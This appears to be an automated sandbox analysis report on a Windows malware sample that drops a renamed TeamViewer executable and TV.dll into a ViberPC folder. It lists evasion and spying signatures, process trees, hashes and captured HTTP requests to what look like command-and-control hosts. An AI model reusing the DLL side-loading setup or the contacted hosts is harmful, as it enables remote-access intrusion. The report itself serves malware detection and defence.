Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report wogZe27GBB.exe

Overview

General Information

Sample Name:wogZe27GBB.exe
Analysis ID:483790
MD5:5efc68abd7fec415e34980d95a06a66a
SHA1:34b243a0b3e322b8983b528caa5849395360a91d
SHA256:0f655a8ac0d7fdc7ac44fdd9799129848faf9c73bfa0e108fd903de439447232
Tags:exeMappingOOOsigned
Infos:

Most interesting Screenshot:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:17
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Tries to detect sandboxes and other dynamic analysis tools (window names)
Creates processes via WMI
DLL side loading technique detected
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Contains functionality to execute programs as a different user
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
EXE planting / hijacking vulnerabilities found
PE file does not import any functions
DLL planting / hijacking vulnerabilities found
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates or modifies windows services
Uses Microsoft's Enhanced Cryptographic Provider
May check if the current machine is a sandbox (GetTickCount - Sleep)
Contains functionality to delete services
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • wogZe27GBB.exe (PID: 7160 cmdline: 'C:\Users\user\Desktop\wogZe27GBB.exe' MD5: 5EFC68ABD7FEC415E34980D95A06A66A)
    • UniPrint.exe (PID: 4260 cmdline: 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • UniPrint.exe (PID: 5356 cmdline: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • svchost.exe (PID: 4296 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5904 cmdline: c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'uniprint.exe' -s USBManager MD5: FA6C268A5B5BDA067A901764D203D433)
  • svchost.exe (PID: 6852 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • UniPrint.exe (PID: 6952 cmdline: 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • UniPrint.exe (PID: 7016 cmdline: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • UniPrint.exe (PID: 7080 cmdline: 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • svchost.exe (PID: 6408 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • UniPrint.exe (PID: 6484 cmdline: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • svchost.exe (PID: 5248 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: wogZe27GBB.exeVirustotal: Detection: 53%Perma Link
Source: wogZe27GBB.exeReversingLabs: Detection: 62%
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dllReversingLabs: Detection: 51%
Source: 0.2.wogZe27GBB.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen2
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_0049B32E __EH_prolog3,CryptGenRandom,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_0049B4A0 __EH_prolog3_catch,CryptAcquireContextA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_006F605B CryptReleaseContext,
Source: C:\Users\user\Desktop\wogZe27GBB.exeEXE: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WINSTA.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: SAMCLI.DLL
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WINMM.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: bcrypt.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: Secur32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: SHFolder.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: VERSION.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: version.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: userenv.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WININET.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: Cabinet.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: MSVFW32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: CRYPTSP.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: AVICAP32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WSOCK32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: MPR.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: edputil.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: iertutil.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: urlmon.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: SHFOLDER.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WINMMBASE.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: NETUTILS.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: SRVCLI.DLL
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: CLDAPI.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: SensApi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: msimg32.dll

Compliance:

barindex
Uses 32bit PE filesShow sources
Source: wogZe27GBB.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
EXE planting / hijacking vulnerabilities foundShow sources
Source: C:\Users\user\Desktop\wogZe27GBB.exeEXE: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeJump to behavior
DLL planting / hijacking vulnerabilities foundShow sources
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WINSTA.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: SAMCLI.DLL
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WINMM.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: bcrypt.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: Secur32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: SHFolder.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: VERSION.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: version.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: userenv.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WININET.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: Cabinet.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: MSVFW32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: CRYPTSP.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: AVICAP32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WSOCK32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: MPR.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: edputil.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: iertutil.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: urlmon.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: SHFOLDER.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WINMMBASE.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: NETUTILS.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: SRVCLI.DLL
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: CLDAPI.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: SensApi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: msimg32.dll
Uses secure TLS version for HTTPS connectionsShow sources
Source: unknownHTTPS traffic detected: 45.153.241.148:443 -> 192.168.2.4:49767 version: TLS 1.2
PE / OLE file has a valid certificateShow sources
Source: wogZe27GBB.exeStatic PE information: certificate valid
Binary contains paths to debug symbolsShow sources
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000000.684861880.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000000.698733412.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.756410027.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.759885262.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000000.758970133.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.778184105.0000000000733000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000000.684861880.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000000.698733412.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.756410027.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.759885262.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000000.758970133.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.778184105.0000000000733000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000002.707742521.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000002.1076091636.000000006E5CC000.00000002.00020000.sdmp, svchost.exe, 00000007.00000002.1072106592.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759626756.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.762333599.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000002.776275044.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.780622367.000000006E5CC000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb< source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, nsrC1CA.tmp.0.dr
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_0040263E FindFirstFileA,
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C2EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C2960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5C2EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5C2960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose,
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85991Content-Type: multipart/form-data; boundary=--------988836371User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 86008Content-Type: multipart/form-data; boundary=--------2871961252User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85958Content-Type: multipart/form-data; boundary=--------2035396243User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=42047145&p=10000001&client=DynGate&data=FyQSbQCjHqkys5MkoZ6YmBgcGRsZGpmckySiHpgTJqChnpg8MrGzGjExHByxGZkbr5kcmpsaHBgbGRsTJqSiHpg8MrGzGjExHByxGZkbr5kcmpsaHBgbGRsTJ6meq7S3GZcYmJMrHpialxgXGxwbkCip HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=42047145&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=42047152&p=10000001&client=DynGate&data=FyQS8QAjHqmyuig6sTY0saWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAH7LQs0qhaWs0MJjaOW1RZp/s+y/yn5XEbeVZg9sKBJ5zPw4VSW4zdwQ3dPOJPU35FNkIfcILZEzewXzbzR9HNSPt0dvZIMvjxebsFa8mt4yIfhUHNJCrU/eCKZvCgbkPO7XECRgFWPWpqy/DxavH2VA1uMNeC6MgWi1tqYJlUpU HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=42047152&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s7cwujq5MqWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAABKJHDw2LgVxSDgQRZJcruSvmCif9Gt2TW3hKr1gLfUfE+41DTTEIjH9R8iP3LoBGOJ+mtJU9XCLVeH0PEI9syAw5y9+liHYCQSiHVEX/VS+caNKAiNEKBpchOIJAAICwW843p+TOKZHDFo8qX87SA1CKgBTr4AFtosrqQ/gO/pU HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=42047159&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=42047224&p=10000001&client=DynGate&data=FyQS6wChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMlsrK4MLY0uzKemJMmMLczurCzsp61MJMmNLGytzmyqjy4Mp6YEyakoh6YPDKxsxoxMRwcsRmZG6+ZHJqbGhwYGxkbEyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpqTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=42047224&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=975066281&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.235.146Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /dout.aspx?s=12251267&p=10000001&client=DynGate HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.235.146Content-Length: 3Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /dout.aspx?s=12251267&p=10000002&client=DynGate HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.235.146Content-Length: 500000Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=12251267&m=fast&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.235.146Connection: Keep-AliveCache-Control: no-cache
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: svchost.exe, 00000010.00000003.796660082.00000217C6F8B000.00000004.00000001.sdmpString found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE",